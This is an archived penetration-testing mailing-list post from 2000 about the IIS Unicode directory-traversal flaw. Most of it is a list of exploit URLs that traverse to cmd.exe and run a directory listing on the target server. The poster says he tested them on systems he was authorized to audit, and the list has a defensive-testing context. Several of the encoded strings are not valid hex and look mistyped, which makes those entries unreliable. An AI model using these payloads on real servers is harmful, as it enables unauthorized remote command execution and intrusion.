Penetration Testing mailing list archives
[PEN-TEST] IIS UNICODE Strings
From: Mike Ahern <mc_ahern () YAHOO COM>
Date: Fri, 27 Oct 2000 13:35:43 -0700
I have been trying to track the various strings when I find them, and here is a list so far. I have tested many of these and found many to work on systems I am authorized to audit. Initial reports seemed to indicate that this was predominately a foreign (non US English) web server problem, however I have found that there are many vulnerable US English servers. In initial tests I found one non-US web site and three US web sites vulnerable for a single client. That made me wonder how many internal file & print, exchange, sql, and other servers with IIS installed were vulnerable within the network. In my testing I have found a good number of internal US servers vulnerable as well. Certainly not the majority, but fairly well represented anyhow. I suspect this is a partial list of UNICODE strings... Happy Testing... -mch http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ http://address.of.iis5.system/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ http://address.of.iis5.system/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ http://address.of.iis5.system/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ http://address.of.iis5.system/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ http://address.of.iis5.system/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ http://address.of.iis5.system/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ http://address.of.iis5.system/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ __________________________________________________ Do You Yahoo!? Yahoo! Messenger - Talk while you surf! It's FREE. http://im.yahoo.com/
Current thread:
- [PEN-TEST] IIS UNICODE Strings Mike Ahern (Oct 31)
- Re: [PEN-TEST] IIS UNICODE Strings Erick Arturo Perez Huemer (Oct 31)
- <Possible follow-ups>
- Re: [PEN-TEST] IIS UNICODE Strings Michael Owen (Oct 31)
- Re: [PEN-TEST] IIS UNICODE Strings Daniel Docekal (Oct 31)